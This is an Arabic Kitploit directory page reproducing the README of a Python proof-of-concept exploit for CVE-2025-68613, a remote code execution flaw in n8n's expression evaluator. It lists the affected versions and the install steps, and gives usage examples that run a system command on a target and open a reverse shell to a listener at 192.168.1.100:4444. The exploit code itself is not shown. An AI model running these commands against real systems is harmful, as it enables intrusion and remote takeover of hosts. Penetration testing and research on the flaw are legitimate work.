Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68613-Python-Exploit — استغلال Python لثغرة CVE-2025-68613. | Kitploit
أدوات/GitHubGitHub/johanneslks/cve-2025-68613-python-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubjohanneslks/cve-2025-68613-python-exploit

CVE-2025-68613-Python-Exploit

استغلال Python لثغرة CVE-2025-68613.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

CVE-2025-68613: تنفيذ التعليمات البرمجية عن بُعد في تعبيرات سير عمل n8n

إثبات المفهوم (PoC) لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد الحرجة في منصة أتمتة سير العمل n8n.


الوصف

توجد الثغرة في نظام تقييم التعبيرات في n8n. لا يتم عزل التعبيرات التي يقدمها المستخدم بشكل صحيح، مما يسمح للمهاجمين المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية على النظام المضيف.

معرّف CVE: CVE-2025-68613
نوع الثغرة: تنفيذ التعليمات البرمجية عن بُعد (RCE)
المكوّن: مُقيّم التعبيرات


الإصدارات المتأثرة

  • n8n >= 0.211.0
  • n8n < 1.120.4
  • n8n < 1.121.1
  • n8n < 1.122.0

التثبيت

root@kitploit:~
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt

الاستخدام

الصيغة

root@kitploit:~
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]

الوسائط

  • -t, --target : عنوان الهدف (مثل: http://localhost:5678)
  • -u, --username : البريد الإلكتروني لحساب n8n
  • -p, --password : كلمة مرور حساب n8n
  • -c, --cmd : أمر النظام المطلوب تنفيذه
  • --reverse-shell : تشغيل قشرة عكسية (الصيغة: IP PORT)

أمثلة

التحقق من الثغرة / تنفيذ أمر:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"

إنشاء قشرة عكسية:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444
تنزيل الأداة